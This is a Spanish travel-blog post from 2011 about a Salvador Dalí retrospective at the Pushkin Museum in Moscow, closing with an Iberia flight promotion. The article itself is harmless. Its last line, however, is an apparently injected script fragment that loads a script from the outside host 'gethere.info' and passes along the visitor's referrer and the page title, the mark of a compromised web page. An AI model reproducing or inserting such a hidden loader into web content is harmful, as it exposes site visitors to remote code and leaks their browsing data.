Nuestro genial Dalí visita Rusia

07/11/2011

Boris Messerer, escenógrafo del teatro Bolshói ruso es el diseñador de un proyecto expositivo con un único protagonista: el particular genio Salvador Dalí. Tener a este reconocido pintor ruso como director de orquesta de la exposición asegura que la exhibición sea atractiva sí o sí.

La organización del evento la lleva a cabo la Fundació Gala-Salvador Dalí, enmarcada dentro de la celebración del Año Dual España-Rusia, y tiene lugar, hasta el próximo 13 de noviembre, en el Museo Pushkin de Bellas Artes de Moscú. Se trata de la mayor muestra antológica de obra original del artista español celebrada hasta el momento en Rusia.

La exposición recorre toda su trayectoria artística, lo que permite palpar la evolución técnica e incluso personal de Dalí. Sus tendencias narcisistas y megalómanas son, como siempre, evidentes en todas sus obras. Y es que el centenar de piezas reunidas para la ocasión permiten vislumbrar tanto sus influencias como sus recursos temáticos o sus referentes ideológicos y sus simbolismos. El original y surrealista universo de Salvador Dalí sigue intrigando a cualquiera. Quién sabe, tal vez admirando los óleos, acuarelas, dibujos y fotografías de esta retrospectiva lleguemos a conocer al genio catalán un poco más de cerca.

Iberia ofrece hasta 3 vuelos a Moscú cada día desde Madrid y cómodas conexiones desde el resto de la red.

Foto  | /photos/krancien/

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;